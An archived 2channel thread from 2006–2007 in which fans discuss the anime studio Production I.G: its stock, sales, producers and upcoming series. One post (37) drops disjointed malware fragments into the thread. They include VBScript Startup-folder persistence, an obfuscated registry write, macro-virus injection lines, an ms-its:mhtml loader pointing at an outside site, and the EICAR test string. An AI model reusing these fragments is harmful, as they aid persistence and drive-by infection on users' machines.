2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

Production I.G/プロダクションI.G 14作目

1 :名無しさん名無しさん:2006/11/21(火) 00:14:11
このスレッドはアニメーション制作会社 Production I.G について語るスレッドです

・公式
Production I.G
http://www.production-ig.co.jp/

・関連会社
XEBEC http://www.production-ig.co.jp/xebec/index.html
Production I.G, LLC http://productionig.com/

前スレ
Production I.G/プロダクションI.G 13作目
http://anime.2ch.net/test/read.cgi/iga/1141481746/

2 :名無しさん名無しさん:2006/11/21(火) 00:15:11
・過去スレ

【社員専用】Production I.G/プロダクションI.G 11 (実質12作目)
http://anime.2ch.net/test/read.cgi/iga/1139843285/
【社員専用】Production I.G/プロダクションI.G 10(実質11作目)
http://anime.2ch.net/test/read.cgi/iga/1139283534/
Production I.G/プロダクションI.G 9作目(実質10作目)
http://anime.2ch.net/test/read.cgi/iga/1135200814/
Production I.G/プロダクションI.G 9作目
http://anime.2ch.net/test/read.cgi/iga/1132147144/
Production I.G/プロダクションI.G 8作目
http://anime.2ch.net/test/read.cgi/iga/1126501407/
Production I.G/プロダクションI.G 7作目
http://anime.2ch.net/test/read.cgi/iga/1113814580/l50
Production I.G/プロダクションI.G 6作目
http://comic5.2ch.net/test/read.cgi/asaloon/1098969734/l50
Production I.G/プロダクションI.G 5作目
http://comic5.2ch.net/test/read.cgi/asaloon/1088864621/l50
Production I.G/プロダクションI.G 4作目
http://comic5.2ch.net/test/read.cgi/asaloon/1079794837/l50
【作画力は】プロダクション I.G【あるけど…】
http://comic3.2ch.net/test/read.cgi/asaloon/1070146202/l50
プロダクションIGの作画力は世界一ぃぃぃぃ!
http://comic2.2ch.net/test/read.cgi/asaloon/1060699094/l50
プロダクションIGを語ろう
http://comic2.2ch.net/test/read.cgi/asaloon/1049102882/l50

3 :名無しさん名無しさん:2006/11/21(火) 00:17:03
その他のスレッド

押井守、Production I.Gファン“教官”都々目さとし
http://anime.2ch.net/test/read.cgi/iga/1104653153/
西尾鉄也を語るスレ
http://anime.2ch.net/test/read.cgi/iga/1134731776/
こんな押井守はアニメ業界から永久追放!!
http://anime.2ch.net/test/read.cgi/iga/1162533544/

マーケット
【3791】プロダクションIG Part6【rise】
http://ex13.2ch.net/test/read.cgi/livemarket1/1162270656/

4 :名無しさん名無しさん:2006/11/21(火) 00:18:29
上場申請のための有価証券報告書
http://search.yahoo.co.jp/search?p=%E6%A0%AA%E5%BC%8F%E4%BC%9A%E7%A4%BE%E3%83%97%E3%83%AD%E3%83%80%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3+%E6%96%B0%E6%A0%AA&ei=UTF-8&fr=top&x=wrt&meta=vc%3D

ライブドアファイナンス掲示板
http://m.finance.livedoor.com/kabu/sled?c=3791

ヤフーファイナンス・株価チャート
http://quote.yahoo.co.jp/q?s=3791.q&d=c&t=1d

IG石川代表「イノセンスは商業的に大失敗、しかしIGのブランドは高まった」
ttp://nikkeibp.jp/style/biz/person/ig/060119_bakuchi/index.html

5 :名無しさん名無しさん:2006/11/21(火) 00:19:55
「ガンダムSEED」から「BLOOD+」へのリレーイベントが開催
−DESTINY最終回や生アフレコに5,000人が熱狂
http://www.watch.impress.co.jp/av/docs/20051011/seedb.htm

アニメ「BLOOD+」制作発表。DVD/UMDビデオ化も予定
−ストリンガー会長も「大好き」。ソニーが総力支援
http://www.watch.impress.co.jp/av/docs/20050825/blood.htm

TVアニメ「BLOOD+」の制作発表会を東大で開催
−UMD/DVD化も予定。押井守や栗山千明らが出席
http://www.watch.impress.co.jp/av/docs/20050511/blood.htm

6 :名無しさん名無しさん:2006/11/21(火) 20:35:37
株価さがりっぱ

7 :名無しさん名無しさん:2006/11/22(水) 22:14:22
もう駄目だな

8 :名無しさん名無しさん:2006/11/24(金) 21:32:41
甲殻のDVD売り上げもいまいちな勢い?

9 :名無しさん名無しさん:2006/11/25(土) 22:22:13
IGPXも駄目、血+も駄目、シュヴァリエも駄目…

10 :名無しさん名無しさん:2006/11/26(日) 02:30:04
w

11 :名無しさん名無しさん:2006/11/27(月) 11:06:38
攻殻頼りだな

12 :名無しさん名無しさん:2006/11/27(月) 11:17:35
攻殻の儲けも押井のクソ映画で吐き出させられます

13 :名無しさん名無しさん:2006/11/27(月) 19:19:51
攻殻SAC4 チン☆⌒ 凵\(\・∀・) まだぁ?

14 :名無しさん名無しさん:2006/11/27(月) 21:02:39
攻殻もういいよ

15 :名無しさん名無しさん:2006/11/27(月) 21:30:33
攻殻なくなったらIG潰れてしまうよ

16 :名無しさん名無しさん:2006/11/27(月) 22:00:21
じゃあIGもういいよ

17 :名無しさん名無しさん:2006/11/27(月) 22:03:11
あやかしの次の土6は攻殻4。

プロデューサー竹P
ストーリーコンセプト オシイ星人

18 :名無しさん名無しさん:2006/11/28(火) 00:11:15
竹Pと押井って意見合うんだろうかね?
電波対決してそう

19 :名無しさん名無しさん:2006/12/02(土) 00:39:47
血+の東大での公演で一緒になったんだろ?

20 :名無しさん名無しさん:2006/12/02(土) 00:51:00
I.Gマガジン2号はまだですかw

21 :名無しさん名無しさん:2006/12/05(火) 19:47:30
おーい。イノセンス買ってきたぞ。

こりゃ核地雷だわ。
DVDと大して変わらん。1080pとか書いてあるけど、全然1080pに見えない。全体的にフォーカスが甘い感じ。もとのソースがフィルムだし、そのまたソースが縦600ドットだからこんなもんか・・・。

アイスエイジにしとけばよかった・・・あっちならフルで1080pだし・・・。orz

以上、人柱からの報告でした。

22 :名無しさん名無しさん:2006/12/05(火) 20:06:30


23 :名無しさん名無しさん:2006/12/08(金) 03:10:47
I.Gが空の境界のアニメ作るってマジ?

24 :名無しさん名無しさん:2006/12/08(金) 03:48:10
初耳。
原作はけっこう好きだからヤメテクレ。

25 :名無しさん名無しさん:2006/12/08(金) 21:39:25
IGPXの25、26話の映像、2-3プルダウンされてないところが多々あって
いろんなところの動きがカクカクです
どうにかしてください

26 :名無しさん名無しさん:2006/12/09(土) 05:25:28
プルダウンしないなんてことありえんだろ
尺があわなくなるし

27 :名無しさん名無しさん:2006/12/09(土) 07:23:21
ダウソ厨だろ

28 :名無しさん名無しさん:2006/12/09(土) 13:28:50
>>26
4コマが1コマ増えてそのまま5コマになってるんだよ

29 :名無しさん名無しさん:2006/12/09(土) 19:50:38
地上波でIG作品を見る事はもうないんだろうか・・・

30 :名無しさん名無しさん:2006/12/10(日) 14:09:41
あるとしたら、早くて1年半後くらいには守り人が降りてくるくらい?
BSでやった奴は殆どが降りてくるから。
ただ続編やったら分からないね。
彩雲国もまだ降りてこないうちに新シリーズするのが決まったし。

31 :名無しさん名無しさん:2006/12/15(金) 17:20:56
記録作ってくれそう

32 :名無しさん名無しさん:2006/12/16(土) 14:10:02
なんの?

33 :名無しさん名無しさん:2006/12/17(日) 01:05:28
それより過疎はげしすぎな件

34 :名無しさん名無しさん:2006/12/18(月) 08:26:30
よし!あげて見るか。

35 :名無しさん名無しさん:2006/12/18(月) 18:42:09
下請けだけやってろよ

36 :名無しさん名無しさん:2006/12/20(水) 01:22:31
演出いつ育つん?

37 :名無しさん名無しさん:2006/12/20(水) 05:33:54
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()

38 :名無しさん名無しさん:2006/12/24(日) 08:51:31
倒産だァ

39 :名無しさん名無しさん:2006/12/27(水) 06:14:09
ライディーンがあるじゃないか。
本郷みつるに期待している。

40 :名無しさん名無しさん:2006/12/27(水) 06:58:38
あれはどっからどう見ても期待できないw

41 :名無しさん名無しさん:2006/12/27(水) 17:55:03
守り人に期待している
原作ファンだけどアニメならではの
面白さを引き出してもらいたい
ジブリじゃないといやとか言ってた連中を黙らせる勢いで。
血+で失敗した戦う女をがっつり描いてほしい



42 :名無しさん名無しさん:2006/12/28(木) 00:45:18
売れるもん作れ

43 :名無しさん名無しさん:2006/12/28(木) 01:39:27
こーかくか

44 :名無しさん名無しさん:2006/12/28(木) 02:00:41
IG作品の魅力的な女キャラってぜんぶ三十路以上じゃね?

45 :名無しさん名無しさん:2006/12/28(木) 20:10:12
血+の小夜は魅力ないよ
つか血+の女キャラはどれもまずい

46 :名無しさん名無しさん:2006/12/29(金) 17:02:15
血+はなかったことに

47 :名無しさん名無しさん:2006/12/30(土) 06:28:44
血+のプロデューサーは失敗の責任を取って左遷。

失敗の度合いならお伽草子のほうがダントツ上なのに、こちらのプロデューサーは現役バリバリなのがこの会社のおかしい所。

48 :名無しさん名無しさん:2006/12/30(土) 10:26:24
ブルーシードをリメイクで

49 :名無しさん名無しさん:2006/12/30(土) 12:03:46
アニメ会社の左遷ってどんな処遇になるんだ?
韓国連絡員とかか。

50 :名無しさん名無しさん:2006/12/30(土) 12:19:17
韓国常勤
キセが飛ばされてたことがある

51 :名無しさん名無しさん:2006/12/30(土) 17:13:04
櫻井氏を見つけてきた以外で、石川が役に立ったことは一度もないのに。

52 :名無しさん名無しさん:2006/12/30(土) 18:02:54
IG -> GONZOってのは聞いたことある

53 :名無しさん名無しさん:2006/12/30(土) 21:42:03
>>49
他社へ出向になる。

>>52みたいなのもそう。

54 :名無しさん名無しさん:2006/12/31(日) 01:49:15
ごめん
今のIGだったらゴンゾの方が好きだわ

55 :名無しさん名無しさん:2007/01/01(月) 19:57:42
おとぎのPは現場受けは悪くない人だからねー。
基本人に尽くす人みたいだし。実際はよくわからんが。

血+のPは結構押せ押せな現場づくりで早いうちから主力のアニメーター離れが顕著だときいた。
後半の現場は悲惨だったらしいが、それはどの現場でも言えることでもある…。

…結局どこに左遷になったんだ?


56 :名無しさん名無しさん:2007/01/02(火) 14:06:14
IGPXをレンタルで見た
何つうか主人公の性格が最後まで掴めなかった
内向的なようで外交的な感じで話によってコロコロ変わりすぎ
これじゃ感情移入出来ないなあ

57 :名無しさん名無しさん:2007/01/02(火) 15:32:07
エウレカと同じだな

なんつうかこれって「制作会社」の性格なんじゃなかろうか
仕事の相手によってころころ言うこと変える

58 :名無しさん名無しさん:2007/01/02(火) 16:27:06
空の境界はユーフォーテーブルだろ

59 :名無しさん名無しさん:2007/01/03(水) 06:19:33
片道切符?

60 :名無しさん名無しさん:2007/01/04(木) 21:20:43
錬金の西沢Pも左遷されたんか?

61 :名無しさん名無しさん:2007/01/04(木) 22:09:23
ジーベックに出向か

62 :名無しさん名無しさん:2007/01/05(金) 13:43:19
カレイドではどういう形で関わってたの?

63 :名無しさん名無しさん:2007/01/06(土) 13:14:58
ig公式の社長の字が…
あれが本人の文字なら代筆とか頼めなかったんだろうか?


64 :名無しさん名無しさん:2007/01/07(日) 21:54:27
ブラッドプラスの藤崎監督はどうしたのかな。


65 :名無しさん名無しさん:2007/01/08(月) 02:03:23
彼は超監督になりました

66 :名無しさん名無しさん:2007/01/08(月) 05:01:30
なんであんな金のかかったタイトルに新人監督投入したんだか
理解に苦しむ

67 :名無しさん名無しさん:2007/01/08(月) 05:40:36
藤崎こそ左遷するべきだったな。
XBOXのエグザスケルトンとかwwwwww あいつほど失敗作連発したやつはいねぇだろwwww

68 :名無しさん名無しさん:2007/01/12(金) 00:35:15
>>56
次はライディーンだな

戦いに巻き込まれた“普通”の少年が「なぜ僕が戦わなくちゃいけないんだ!」と悩み苦しむ悲劇のドラマになる予感。
ややこしい太古の文明の設定を語る長セリフのオンパレードになる予感。
そして裏設定を作り込みすぎて物語に反映できず、わかりにくい展開と世界観になる予感
謎や思わせぶりな伏線を張りまくって、結局は落とせないでウヤムヤになる最終回の予感。
登場人物を出しすぎて収集が着かなくなり、物語展開の足を引っ張るだけの相関図になる予感。
物語の展開の都合でコロコロ変わる主人公の性格と行動原理・・・。


で、一話のビジュアル的なクオリティだけは手間をかけて凄い予感。
あと、ライディーンが登場すると「あ、あれは・・・」というセリフを言うキャラがいる予感。

69 :名無しさん名無しさん:2007/01/12(金) 01:28:41
>>66
逆に考えるんだ。
実際はこけても良かったから新人監督を使ったと。
igは攻殻がこけなきゃ他は当たろうがこけようがってことじゃないか。

70 :名無しさん名無しさん:2007/01/12(金) 06:07:34
いや、当てようとしてたぞ
宣伝も派手、漫画やノベライズなどの同時展開、
マニア人気のクリエイターのキャラデザ、
そして社長自らのメディアを使ったアピール

そして神山の一人勝は続く

71 :名無しさん名無しさん:2007/01/12(金) 12:12:20
>>68
トレーラーみると、そのビジュアルのクオリティが無駄な方向に頑張って見えるんだよ・・・
表面キンキラにしても面白くならないし技術的に凄くもならない。
正直微妙。

72 :名無しさん名無しさん:2007/01/12(金) 12:54:28
正直スタッフのとこによくある
「なんとかなんとかってすごい作品を作ったスタッフです!」
みたいなのはもうなんの信用にもならんよな。


73 :名無しさん名無しさん:2007/01/12(金) 16:03:50
>>71
だよな
もう、CGで驚く客はいないし、
もういいかげん「手間のかかった大変なことやりました」じゃなくて、
普通に面白い作品作ったほうが尊敬される時代のような気がするよ

74 :名無しさん名無しさん:2007/01/12(金) 17:51:39
ttp://www.kabujouhou.com/contents/gyoseki/index2.php?boardno=6623
燃料投下

75 :名無しさん名無しさん:2007/01/12(金) 20:19:42
2ちゃんねる閉鎖
http://www.zakzak.co.jp/top/2007_01/t2007011201.html

76 :名無しさん名無しさん:2007/01/14(日) 19:56:26
メコも閉鎖

77 :名無しさん名無しさん:2007/01/14(日) 20:22:08
>>67
・・・・・エグザスケルトンの企画も神山が言いだしっぺじゃなかったっけ?

78 :名無しさん名無しさん:2007/01/15(月) 01:34:44
アンチも来ないくらい過疎っている

79 :名無しさん名無しさん:2007/01/15(月) 02:00:33
なんか石川はアニメを工業製品とかと勘違いしてるんじゃないのかな
綺麗できちんとした規格品が見たいんじゃないんだよ

80 :名無しさん名無しさん:2007/01/16(火) 02:40:54
粘着アンチもいなけりゃ、
擁護する工作員もいない平和なスレ

81 :名無しさん名無しさん:2007/01/16(火) 09:36:49
>>60


82 :名無しさん名無しさん:2007/01/19(金) 18:44:52
にんげんドキュメント 「監督・神山健治」 My番組表に登録する
▽世界的人気TVアニメ“攻殻機動隊”に続く新作の現場
1月19日(金) 22:00〜22:50
NHK総合
にんげんドキュメント◇日本アニメ界の気鋭の監督、神山健治氏の魅力に迫る。
神山氏が手掛けたテレビシリーズ「攻殻機動隊SAC」はDVD150万枚を売り上げ、
文化庁メディア芸術祭などで各賞を受賞した。人気の秘密は、周到に練られた
リアルな物語。近未来の警察を舞台にした作品だが、現実社会でも起こり得る事件
やエピソードを巧みに配置し、犯人の心理までも深く描き出すなどのストーリー展開が、
これまでアニメを見なかった人々から支持されている。神山氏は現在、中世アジアを
思わせる架空世界を舞台に女性の用心棒の姿を描く歴史ファンタジー「精霊の守り人」に
取り組んでいる。脚本家たちと山にこもり徹夜で議論する"脚本合宿"や、毎回10時間以上
もかける"脚本会議"など、神山氏の制作現場に密着する。

83 :名無しさん名無しさん:2007/01/19(金) 19:50:43
スタッフがテレビに出るというのに過疎りすぎw

84 :名無しさん名無しさん:2007/01/20(土) 03:08:01
IG作品なのに社長の顔が出ないのは珍しかったですね。
代わりに監督の両親が顔出ししてましたね。

85 :名無しさん名無しさん:2007/01/20(土) 08:04:08
なんかへんなの

86 :名無しさん名無しさん:2007/01/22(月) 14:58:41
ヒットすんのかね
精霊の守り人って読んでねーけど何となくコーショーなフインキじゃん

BS2でヒットしたの、さくらとマ王が双璧で
十二国記やプラネテスなんかは正直駄目だったんだろ

87 :名無しさん名無しさん:2007/01/22(月) 23:27:43
まああんまり魅力は感じないわな
設定がオーソドックスだと、ストーリー性とかに期待したいところだが、
それって一番IGに期待できない所だし。
IGは緻密な設定と作画、厨が喜ぶ知ったか高尚セリフ。

88 :名無しさん名無しさん:2007/01/23(火) 00:14:06
>>87
>IGは緻密な設定と作画
え…

89 :名無しさん名無しさん:2007/01/23(火) 00:50:42
神山なんかより北久保使えよ

90 :名無しさん名無しさん:2007/01/23(火) 03:12:24
>>86
高尚というか児童書なんだけどね

91 :名無しさん名無しさん:2007/01/23(火) 15:20:27
>89
北久保はもうダメだろ
アニメなんたらとかに出て、自分に心地いい場所にしか
行けなくなってる引きこもりだからな

92 :名無しさん名無しさん:2007/01/23(火) 19:52:46
北久保さんはブラッド作ってから様子が変わってしまったんだよな
残念でならない

93 :名無しさん名無しさん:2007/01/23(火) 22:14:12
>>91
アニメなんたらってなに?
教えてほしい

94 :名無しさん名無しさん:2007/01/24(水) 02:56:28


95 :名無しさん名無しさん:2007/01/24(水) 03:25:06
>>91
神山乙

18 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)